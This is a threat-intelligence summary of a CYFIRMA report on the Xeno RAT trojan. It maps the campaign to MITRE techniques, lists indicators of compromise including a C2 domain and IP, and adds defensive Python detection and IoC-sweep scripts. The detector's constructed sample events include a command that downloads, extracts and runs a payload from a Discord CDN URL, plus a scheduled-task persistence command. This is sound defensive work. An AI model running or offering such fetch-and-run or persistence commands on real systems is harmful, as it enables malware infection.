Xeno RAT: A New Remote Access Trojan with Advance Capabilities – CYFIRMA

Xeno RAT is a feature-rich remote access trojan whose source is published as an open-source project on GitHub; a threat actor repackaged it and distributed it through the Discord CDN. The campaign uses multi-stage payloads, anti-analysis techniques, DLL search order hijacking, and process injection to achieve persistence and C2 communication, highlighting the need for vigilant security practices. #XenoRAT #GitHub #DiscordCDN #ADExplorer64 #internal-liveapps.online

Keypoints

  • Xeno RAT is a sophisticated remote access trojan written in C#, with advanced capabilities.
  • Its source is open-sourced on GitHub and available free of charge.
  • A threat actor customized it and distributed it via the Discord CDN.
  • The initial vector is a shortcut file (.lnk) disguised as a WhatsApp image, which acts as the downloader.

MITRE Techniques

  • [T1059.003] Windows Command Shell – The .lnk downloader uses the Windows command shell to retrieve a zip archive from a Discord CDN URL, extract it, and execute the payload. Quote: [‘The Windows command shell to retrieve, extract, and execute the payload from a zip archive, located at the Discord CDN URL.’]
  • [T1053.005] Scheduled Task – The malware adds itself as a scheduled task for persistence (this technique sits under both Execution and Persistence in ATT&CK). Quote: [‘Malware adds itself as scheduled task for persistence.’]
  • [T1204.001] Malicious Link – The primary vector is a shortcut file (.lnk) disguised as a WhatsApp screenshot that acts as the downloader. Note that the victim opens a file rather than a URL, so T1204.002 Malicious File is the closer sub-technique. Quote: [‘The primary vector in the form of a shortcut file, disguised as a WhatsApp screenshot, acts as downloader.’]
  • [T1204.002] Malicious File – The zip archive contains three files: two portable executables (an exe and a DLL) and a file named ‘LICENSE’. Quote: [‘The zip archive contains three files, two portable executable (exe and DLL) files and one unknown file named as ‘LICENSE’.’]
  • [T1622] Debugger Evasion – Uses anti-debugging techniques and operates stealthily; ATT&CK lists this technique under both Defense Evasion and Discovery. Quote: [‘Utilizes anti-debugging techniques and follows a stealth operation process.’]
  • [T1497] Virtualization/Sandbox Evasion – Detects and evades virtualized or sandboxed analysis environments. Quote: [‘…Virtualization/Sandbox Evasion’]
  • [T1055] Process Injection – Injects into the legitimate Windows processes hh.exe (HTML Help) and colorcpl.exe (Color Management). Quote: [‘process injection’]
  • [T1071.001] Web Protocols – C2 communication runs over web protocols, with the traffic obfuscated. Quote: [‘Web Protocols’]
  • [T1574.001] DLL Search Order Hijacking – Loads a malicious samcli.dll by abusing the Windows DLL search order: a DLL with the same name as the legitimate one is placed in the executable's working directory, so it is resolved ahead of the copy in System32. Quote: [‘DLL search order functionality of the Windows operating system by positioning the malicious DLL with the same name in the current working directory.’]
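The technique list above describes one chain: cmd.exe launched from the .lnk fetches and unpacks a zip from the Discord CDN, a scheduled task provides persistence, and the payload injects into hh.exe or colorcpl.exe. The detection logic below, written for this summary and not taken from CYFIRMA or the Xeno RAT project, runs those three rules over constructed Sysmon-style process-creation records. The field names, the sample events, the user-writable path heuristic, and the file name payload.exe are assumptions; only the Discord CDN host, the scheduled-task behaviour, and the two injection targets come from the report.

```python
"""Behavioural detection for the Xeno RAT delivery chain summarised above.

Added example, not CYFIRMA's or the Xeno RAT project's code. Runs over
constructed Sysmon-style process-creation records; field names, sample events
and the name payload.exe are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process


# From the report: cmd.exe pulling a zip from the Discord CDN, a scheduled task
# for persistence, and injection into hh.exe / colorcpl.exe.
DISCORD_CDN = re.compile(r"https?://(?:cdn|media)\.discordapp\.(?:com|net)/", re.I)
INJECTION_HOSTS = {"hh.exe", "colorcpl.exe"}
# Heuristic (assumption, tune per estate): paths a low-privilege user can write to.
USER_WRITABLE = re.compile(r"\\(?:appdata|temp|downloads|users\\public)\\", re.I)
SCHTASKS_TR = re.compile(r'/tr\s+("[^"]*"|\S+)', re.I)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(ev: ProcEvent) -> list[str]:
    """Return the technique labels a single event trips (empty list if none)."""
    hits = []
    img, parent = _base(ev.image), _base(ev.parent_image)
    cmd = ev.cmdline.lower()

    # Stage 1 (T1059.003): cmd.exe fetches the zip from the Discord CDN and unpacks it.
    if img == "cmd.exe" and DISCORD_CDN.search(ev.cmdline):
        hits.append("T1059.003 cmd.exe fetching a payload from the Discord CDN")
        if ".zip" in cmd and any(t in cmd for t in ("tar ", "expand-archive", "expand ")):
            hits.append("T1059.003 zip archive extracted and payload staged")

    # Stage 2 (T1053.005): a new scheduled task whose action lives in a user-writable path.
    if img == "schtasks.exe" and "/create" in cmd:
        m = SCHTASKS_TR.search(ev.cmdline)
        if m and USER_WRITABLE.search(m.group(1).strip('"')):
            hits.append("T1053.005 scheduled task running from a user-writable path")

    # Stage 3 (T1055): an injection host from the report started by a parent that
    # runs from a user-writable path instead of being launched by explorer.exe.
    if img in INJECTION_HOSTS and USER_WRITABLE.search(ev.parent_image):
        hits.append(f"T1055 {img} spawned by suspicious parent {parent}")
    return hits


# Constructed sample events: three from the malicious chain, three benign controls.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c curl -s -o %TEMP%\Sys.zip https://cdn.discordapp.com/attachments/1111/2222/Sys.zip'
              r' && tar -xf %TEMP%\Sys.zip -C %TEMP% && start "" %TEMP%\Sys\payload.exe',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /tn "UpdateCheck" /tr "C:\Users\alice\AppData\Roaming\Sys\payload.exe" /sc minute /mo 5 /f',
              r"C:\Users\alice\AppData\Roaming\Sys\payload.exe"),
    ProcEvent(r"C:\Windows\System32\colorcpl.exe", "colorcpl.exe",
              r"C:\Users\alice\AppData\Roaming\Sys\payload.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir", r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\hh.exe", r"hh.exe C:\Program Files\App\help.chm", r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /tn "VendorAgent" /tr "C:\Program Files\Vendor\agent.exe" /sc daily',
              r"C:\Windows\System32\msiexec.exe"),
]


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> hits for every event that tripped at least one rule."""
    result = {}
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            result[i] = hits
    return result


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: " + "; ".join(hits))
```

Each rule is deliberately narrow: a Discord CDN URL in a cmd.exe command line, a task action under a user-writable directory, and one of the two named injection targets whose parent is not a system binary. Together they cover the chain without firing on the ordinary cmd.exe, hh.exe and installer-created tasks in the benign controls.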

Indicators of Compromise

  • [File] MD5 13b1d354ac2649b309b0d9229def8091, SHA-256 848020d2e8bacd35c71b78e1a81c669c9dc63c78dd3db5a97200fc87aeb44c3c – Hashes of the primary sample and downloader components
  • [File] MD5 6f9e84087cabbb9aaa7d8aba43a84dcf, SHA-256 4d0d8c2696588ff74fe7d9f8c2097fddd665308fccf16ffea23b9741a261b1c0 – Additional hashes from the Sys.zip payload
  • [File] MD5 7704241dd8770b11b50b1448647197a5, MD5 0aa5930aa736636fd95907328d47ea45 – samcli.dll and LICENSE-related artifacts
  • [IP address] 45.61.139.51 – C2 server IP resolved from internal-liveapps.online
  • [Domain] internal-liveapps.online – C2 domain used by Xeno RAT
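A host-side sweep for the indicators above, added here for this summary and not part of CYFIRMA's report or tooling. The hash, domain and IP values are the ones listed; the directory tree, the stand-in samcli.dll and the DNS log lines built in demo() are constructed so the sweep runs offline. Because each file entry pairs an MD5 with a SHA-256, the sweep computes both, and it also flags any samcli.dll found outside System32, which is the footprint of the search order hijack described above.

```python
"""Sweep a directory tree and a DNS/proxy log for the Xeno RAT IoCs above.

Added example, not CYFIRMA's tooling. Hash, domain and IP values come from the
IoC list; the files and log lines in demo() are constructed stand-ins.
"""
import hashlib
import tempfile
from pathlib import Path

IOC_MD5 = {
    "13b1d354ac2649b309b0d9229def8091",
    "6f9e84087cabbb9aaa7d8aba43a84dcf",
    "7704241dd8770b11b50b1448647197a5",
    "0aa5930aa736636fd95907328d47ea45",
}
IOC_SHA256 = {
    "848020d2e8bacd35c71b78e1a81c669c9dc63c78dd3db5a97200fc87aeb44c3c",
    "4d0d8c2696588ff74fe7d9f8c2097fddd665308fccf16ffea23b9741a261b1c0",
}
IOC_NETWORK = {"internal-liveapps.online", "45.61.139.51"}
# The legitimate samcli.dll lives in System32; a same-named copy anywhere else is the hijack.
HIJACKED_DLL = "samcli.dll"


def file_hashes(path) -> tuple[str, str]:
    """MD5 and SHA-256 of a file, streamed in 1 MiB chunks."""
    md5, sha = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            md5.update(chunk)
            sha.update(chunk)
    return md5.hexdigest(), sha.hexdigest()


def sweep(root, md5s=IOC_MD5, sha256s=IOC_SHA256) -> list[tuple[str, str]]:
    """Walk root; report files whose hash is an IoC or that are a misplaced samcli.dll."""
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if not p.is_file():
            continue
        md5, sha = file_hashes(p)
        if md5 in md5s or sha in sha256s:
            findings.append((str(p), "hash matches Xeno RAT IoC"))
        if p.name.lower() == HIJACKED_DLL and "system32" not in str(p.parent).lower():
            findings.append((str(p), "samcli.dll outside System32 (DLL search order hijack)"))
    return findings


def network_hits(lines) -> list[str]:
    """Log lines that mention the C2 domain or its resolved IP."""
    return [ln for ln in lines if any(ioc in ln.lower() for ioc in IOC_NETWORK)]


# Constructed DNS/connection log lines; the second is a benign control.
SAMPLE_DNS_LINES = [
    "2024-03-01T10:00:00Z host01 query A internal-liveapps.online -> 45.61.139.51",
    "2024-03-01T10:00:05Z host01 query A www.microsoft.com -> 20.70.246.20",
    "2024-03-01T10:01:00Z host02 connect tcp 45.61.139.51:443",
]


def demo() -> tuple[int, int, int]:
    """Build a constructed tree, run the sweep twice, and count findings.

    Returns (findings with the listed IoCs, findings after adding the stand-in's
    own SHA-256 to the IoC set, network log hits).
    """
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Sys").mkdir()
        stand_in = root / "Sys" / HIJACKED_DLL
        stand_in.write_bytes(b"MZ constructed stand-in, not the real sample")
        (root / "notes.txt").write_bytes(b"benign")
        baseline = sweep(root)                                  # only the misplaced DLL fires
        _, sha = file_hashes(stand_in)
        with_hash = sweep(root, sha256s=IOC_SHA256 | {sha})     # hash rule fires as well
    return len(baseline), len(with_hash), len(network_hits(SAMPLE_DNS_LINES))


if __name__ == "__main__":
    print(demo())
```

Run sweep() against user-profile and %TEMP% directories on a suspect host, and network_hits() over exported DNS or proxy logs; a samcli.dll finding is worth triaging even when no hash matches, since a recompiled DLL keeps the hijack footprint but not the hash.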

Read more: https://www.cyfirma.com/outofband/xeno-rat-a-new-remote-access-trojan-with-advance-capabilities/